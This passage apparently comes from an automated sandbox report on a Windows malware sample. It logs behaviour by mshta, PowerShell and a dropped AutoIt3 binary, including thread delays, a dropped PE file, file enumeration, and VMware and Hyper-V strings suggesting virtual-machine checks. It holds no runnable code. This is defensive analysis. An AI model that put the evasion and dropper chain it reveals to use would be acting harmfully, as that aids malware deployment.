      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2008Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1218Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4364Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5344Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 819
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7330
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2313
      Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\DonaldDuck[1]Jump to dropped file
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeAPI coverage: 4.9 %
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7076Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 7316Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep time: -13835058055282155s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep count: 7330 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep count: 2313 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep time: -7378697629483816s >= -30000s
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001EA187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_001EA187
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001DE180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_001DE180
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001EA2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_001EA2E4
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001EA66E FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_001EA66E
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001E686D FindFirstFileW,FindNextFileW,FindClose,15_2_001E686D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001DE9BA GetFileAttributesW,FindFirstFileW,FindClose,15_2_001DE9BA
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001E74F0 FindFirstFileW,FindClose,15_2_001E74F0
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001E7591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,15_2_001E7591
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001DDE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_001DDE32
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015CAE75 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,15_2_015CAE75
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015CD545 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,15_2_015CD545
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015CD64D FindFirstFileA,GetLastError,15_2_015CD64D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_0155A20D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,16_2_0155A20D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_0155C9E5 FindFirstFileA,GetLastError,16_2_0155C9E5
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_0155C8DD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,16_2_0155C8DD
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_0018310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,15_2_0018310D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: svchost.exe, 00000004.00000002.2955127845.000001A5E4C27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`sE
      Source: mshta.exe, 00000003.00000003.2259299452.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2251457783.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248766174.000001FD64F9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2264087068.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@!
      Source: mshta.exe, 00000003.00000003.2248766174.000001FD64FD5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2251457783.000001FD64FD5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2264087068.000001FD64FD5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2259299452.000001FD64FD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWZ
      Source: powershell.exe, 00000007.00000002.2231693056.0000014E4E0C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: AutoIt3.exe, 00000010.00000003.2002348869.00000000015A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware
      Source: AutoIt3.exe, AutoIt3.exe, 00000010.00000003.2002348869.00000000015CC000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1999895717.00000000015AD000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2005623906.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1999631456.0000000001601000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2005353723.0000000001553000.00000040.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2000665888.0000000001554000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2002544632.000000000157E000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2002876668.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2002544632.00000000015A2000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2002348869.00000000015A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft hyper-v video
      Source: mshta.exe, 00000003.00000003.2253505540.000002056BBF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
      Source: mshta.exe, 00000003.00000003.2258761903.000001FD65026000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248078541.000001FD65026000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2264358180.000001FD65026000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2957377572.000001A5EA455000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 0000000D.00000002.2160134998.000001887ECC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
